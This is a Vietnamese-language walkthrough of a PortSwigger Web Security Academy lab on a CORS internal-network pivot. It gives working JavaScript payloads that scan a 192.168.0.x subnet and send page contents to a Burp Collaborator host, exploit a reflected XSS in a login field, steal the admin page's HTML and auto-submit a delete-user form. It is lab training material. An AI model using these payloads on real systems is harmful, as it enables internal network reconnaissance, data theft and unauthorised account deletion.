CORS vulnerability with internal network pivot attack

# CORS vulnerability with internal network pivot attack ## 1.Tìm IP trong mạng nội bộ ```htmlembedded= <html> <script> collaboratorURL = 'http://dvcnyp6xn7uyp5cunm7kadwxkoqfe62v.oastify.com' for (let i=0;i<256;i++){ fetch('http://192.168.0.'+i+':8080') .then(response=> response.text()) .then(text => { try { fetch(collaboratorURL + '?ip=' + 'http://192.168.0.' + i + '&code=' + encodeURIComponent(text)) } catch (error) { } }) } </script> </html> ``` Copy vào Exploit Server -> Store -> Deliver exploit to victim Tìm được IP là 192.168.0.61 và source code trang login ![image](https://hackmd.io/_uploads/By6rT-Tw6.png) ```htmlembedded= <!DOCTYPE html> <html> <head> <link href=/resources/labheader/css/academyLabHeader.css rel=stylesheet> <link href=/resources/css/labs.css rel=stylesheet> <title>CORS vulnerability with internal network pivot attack</title> </head> <body> <script src="/resources/labheader/js/labHeader.js"></script> <div id="academyLabHeader"> <section class='academyLabBanner'> <div class=container> <div class=logo></div> <div class=title-container> <h2>CORS vulnerability with internal network pivot attack</h2> <a id='exploit-link' class='button' target='_blank' href='http://exploit-0a350035044985a380c6488301bf00dd.exploit-server.net'>Go to exploit server</a> <a class=link-back href='https://portswigger.net/web-security/cors/lab-internal-network-pivot-attack'> Back to lab description  <svg version=1.1 id=Layer_1 xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' x=0px y=0px viewBox='0 0 28 30' enable-background='new 0 0 28 30' xml:space=preserve title=back-arrow> <g> <polygon points='1.4,0 0,1.2 12.6,15 0,28.8 1.4,30 15.1,15'></polygon> <polygon points='14.3,0 12.9,1.2 25.6,15 12.9,28.8 14.3,30 28,15'></polygon> </g> </svg> </a> </div> <div class='widgetcontainer-lab-status is-notsolved'> <span>LAB</span> <p>Not solved</p> <span class=lab-status-icon></span> </div> </div> </div> </section> </div> <div theme=""> <section class="maincontainer"> <div class="container is-page"> <header class="navigation-header"> <section class="top-links"> <a href=/>Home</a><p>|</p> <a href="/my-account">My account</a><p>|</p> </section> </header> <header class="notification-header"> </header> <h1>Login</h1> <section> <form class=login-form method=POST action="/login"> <input required type="hidden" name="csrf" value="DJv2phmih2CeooESDPNnQaTAGiT6kJkA"> <label>Username</label> <input required type=username name="username" autofocus> <label>Password</label> <input required type=password name="password"> <button class=button type=submit> Log in </button> </form> </section> </div> </section> <div class="footer-wrapper"> </div> </div> </body> </html> <script src="/resources/labheader/js/labHeader.js"></script> <div id="academyLabHeader"> <section class="academyLabBanner"> <div class="container"> <div class="logo"></div> <div class="title-container"> <h2>CORS vulnerability with internal network pivot attack</h2> <a id="exploit-link" class="button" target="_blank" href="http://exploit-0a570057046a88af8136a3dc013f0019.exploit-server.net">Go to exploit server</a> <a class="link-back" href="https://portswigger.net/web-security/cors/lab-internal-network-pivot-attack"> Back to lab description  <svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 28 30" enable-background="new 0 0 28 30" xml:space="preserve" title="back-arrow"> <g> <polygon points="1.4,0 0,1.2 12.6,15 0,28.8 1.4,30 15.1,15"></polygon> <polygon points="14.3,0 12.9,1.2 25.6,15 12.9,28.8 14.3,30 28,15"></polygon> </g> </svg> </a> </div> <div class="widgetcontainer-lab-status is-notsolved"> <span>LAB</span> <p>Not solved</p> <span class="lab-status-icon"></span> </div> </div> </section></div> <div theme=""> <section class="maincontainer"> <div class="container is-page"> <header class="navigation-header"> <section class="top-links"> <a href="/">Home</a><p>|</p> <a href="/admin">Admin panel</a><p>|</p> <a href="/my-account?id=administrator">My account</a><p>|</p> </section> </header> <header class="notification-header"> </header> <form style="margin-top: 1em" class="login-form" action="/admin/delete" method="POST"> <input required="" type="hidden" name="csrf" value="ueASHsgFO6MbB8TLaTjSw38sZe3Opiex"> <label>Username</label> <input required="" type="text" name="username"> <button class="button" type="submit">Delete user</button> </form> </div> </section> <div class="footer-wrapper"> </div> </div> <!DOCTYPE html> <html> <head> <link href=/resources/labheader/css/academyLabHeader.css rel=stylesheet> <link href=/resources/css/labs.css rel=stylesheet> <title>CORS vulnerability with internal network pivot attack</title> </head> <body> <script src="/resources/labheader/js/labHeader.js"></script> <div id="academyLabHeader"> <section class='academyLabBanner'> <div class=container> <div class=logo></div> <div class=title-container> <h2>CORS vulnerability with internal network pivot attack</h2> <a id='exploit-link' class='button' target='_blank' href='http://exploit-0a570057046a88af8136a3dc013f0019.exploit-server.net'>Go to exploit server</a> <a class=link-back href='https://portswigger.net/web-security/cors/lab-internal-network-pivot-attack'> Back to lab description  <svg version=1.1 id=Layer_1 xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' x=0px y=0px viewBox='0 0 28 30' enable-background='new 0 0 28 30' xml:space=preserve title=back-arrow> <g> <polygon points='1.4,0 0,1.2 12.6,15 0,28.8 1.4,30 15.1,15'></polygon> <polygon points='14.3,0 12.9,1.2 25.6,15 12.9,28.8 14.3,30 28,15'></polygon> </g> </svg> </a> </div> <div class='widgetcontainer-lab-status is-notsolved'> <span>LAB</span> <p>Not solved</p> <span class=lab-status-icon></span> </div> </div> </div> </section> </div> <div theme=""> <section class="maincontainer"> <div class="container is-page"> <header class="navigation-header"> <section class="top-links"> <a href=/>Home</a><p>|</p> <a href="/my-account">My account</a><p>|</p> </section> </header> <header class="notification-header"> </header> <h1>Login</h1> <section> <form class=login-form method=POST action="/login"> <input required type="hidden" name="csrf" value="2xFL2jEGadxJODxw5C8v7ym927N4SZfj"> <label>Username</label> <input required type=username name="username" autofocus> <label>Password</label> <input required type=password name="password"> <button class=button type=submit> Log in </button> </form> </section> </div> </section> <div class="footer-wrapper"> </div> </div> </body> </html> ``` Lấy regex csrf ![image](https://hackmd.io/_uploads/B1g6pZav6.png) ## 2.Kiểm tra trường username có dính lỗi XSS hay không ```htmlembedded= <html> <script> collaboratorURL = 'http://dvcnyp6xn7uyp5cunm7kadwxkoqfe62v.oastify.com' url = 'http://192.168.0.61:8080' fetch(url) .then(response => response.text()) .then(text =>{ try { xss = '"><img src='+collaboratorURL+'?foundXSS=1>'; login_path = '/login?username=' +encodeURIComponent(xss)+'&password=random&csrf='+text.match(/csrf" value="([^"]+)"/); location = url + login_path; } catch (error) { } }) </script> </html> ``` Copy vào Exploit Server -> Store -> Deliver exploit to victim ![image](https://hackmd.io/_uploads/r1vB0bpD6.png) -> Có lỗi XSS ở trường username ## 3. Dùng XSS để lấy source trang admin ```htmlembedded= <html> <script> collaboratorURL = 'http://dvcnyp6xn7uyp5cunm7kadwxkoqfe62v.oastify.com' url = 'http://192.168.0.61:8080' fetch(url) .then(response => response.text()) .then(text =>{ try { xss = '"><iframe src=/admin onload="new Image().src=\''+collaboratorURL+'?code=\'+encodeURIComponent(this.contentWindow.document.body.innerHTML)">'; login_path = '/login?username=' +encodeURIComponent(xss)+'&password=random&csrf='+text.match(/csrf" value="([^"]+)"/); location = url + login_path; } catch (error) { } }) </script> </html> ``` Copy vào Exploit Server -> Store -> Deliver exploit to victim ![image](https://hackmd.io/_uploads/HygNJfTvp.png) Lấy được src trang admin ```htmlembedded= <!DOCTYPE html> <html> <head> <link href=/resources/labheader/css/academyLabHeader.css rel=stylesheet> <link href=/resources/css/labs.css rel=stylesheet> <title>CORS vulnerability with internal network pivot attack</title> </head> <body> <script src="/resources/labheader/js/labHeader.js"></script> <div id="academyLabHeader"> <section class='academyLabBanner'> <div class=container> <div class=logo></div> <div class=title-container> <h2>CORS vulnerability with internal network pivot attack</h2> <a id='exploit-link' class='button' target='_blank' href='http://exploit-0a350035044985a380c6488301bf00dd.exploit-server.net'>Go to exploit server</a> <a class=link-back href='https://portswigger.net/web-security/cors/lab-internal-network-pivot-attack'> Back to lab description  <svg version=1.1 id=Layer_1 xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' x=0px y=0px viewBox='0 0 28 30' enable-background='new 0 0 28 30' xml:space=preserve title=back-arrow> <g> <polygon points='1.4,0 0,1.2 12.6,15 0,28.8 1.4,30 15.1,15'></polygon> <polygon points='14.3,0 12.9,1.2 25.6,15 12.9,28.8 14.3,30 28,15'></polygon> </g> </svg> </a> </div> <div class='widgetcontainer-lab-status is-notsolved'> <span>LAB</span> <p>Not solved</p> <span class=lab-status-icon></span> </div> </div> </div> </section> </div> <div theme=""> <section class="maincontainer"> <div class="container is-page"> <header class="navigation-header"> <section class="top-links"> <a href=/>Home</a><p>|</p> <a href="/my-account">My account</a><p>|</p> </section> </header> <header class="notification-header"> </header> <h1>Login</h1> <section> <form class=login-form method=POST action="/login"> <input required type="hidden" name="csrf" value="DJv2phmih2CeooESDPNnQaTAGiT6kJkA"> <label>Username</label> <input required type=username name="username" autofocus> <label>Password</label> <input required type=password name="password"> <button class=button type=submit> Log in </button> </form> </section> </div> </section> <div class="footer-wrapper"> </div> </div> </body> </html> <script src="/resources/labheader/js/labHeader.js"></script> <div id="academyLabHeader"> <section class="academyLabBanner"> <div class="container"> <div class="logo"></div> <div class="title-container"> <h2>CORS vulnerability with internal network pivot attack</h2> <a id="exploit-link" class="button" target="_blank" href="http://exploit-0a570057046a88af8136a3dc013f0019.exploit-server.net">Go to exploit server</a> <a class="link-back" href="https://portswigger.net/web-security/cors/lab-internal-network-pivot-attack"> Back to lab description  <svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 28 30" enable-background="new 0 0 28 30" xml:space="preserve" title="back-arrow"> <g> <polygon points="1.4,0 0,1.2 12.6,15 0,28.8 1.4,30 15.1,15"></polygon> <polygon points="14.3,0 12.9,1.2 25.6,15 12.9,28.8 14.3,30 28,15"></polygon> </g> </svg> </a> </div> <div class="widgetcontainer-lab-status is-notsolved"> <span>LAB</span> <p>Not solved</p> <span class="lab-status-icon"></span> </div> </div> </section></div> <div theme=""> <section class="maincontainer"> <div class="container is-page"> <header class="navigation-header"> <section class="top-links"> <a href="/">Home</a><p>|</p> <a href="/admin">Admin panel</a><p>|</p> <a href="/my-account?id=administrator">My account</a><p>|</p> </section> </header> <header class="notification-header"> </header> <form style="margin-top: 1em" class="login-form" action="/admin/delete" method="POST"> <input required="" type="hidden" name="csrf" value="ueASHsgFO6MbB8TLaTjSw38sZe3Opiex"> <label>Username</label> <input required="" type="text" name="username"> <button class="button" type="submit">Delete user</button> </form> </div> </section> <div class="footer-wrapper"> </div> </div> ``` ## 4. Dùng XSS xóa user carlos ```htmlembedded= <html> <script> collaboratorURL = 'http://dvcnyp6xn7uyp5cunm7kadwxkoqfe62v.oastify.com' url = 'http://192.168.0.61:8080' fetch(url) .then(response => response.text()) .then(text =>{ try { xss = '"><iframe src=/admin onload="var f=this.contentWindow.document.forms[0];if(f.username)f.username.value=\'carlos\',f.submit()">' login_path = '/login?username=' +encodeURIComponent(xss)+'&password=random&csrf='+text.match(/csrf" value="([^"]+)"/); location = url + login_path; } catch (error) { } }) </script> </html> ``` Copy vào Exploit Server -> Store -> Deliver exploit to victim -> Solved .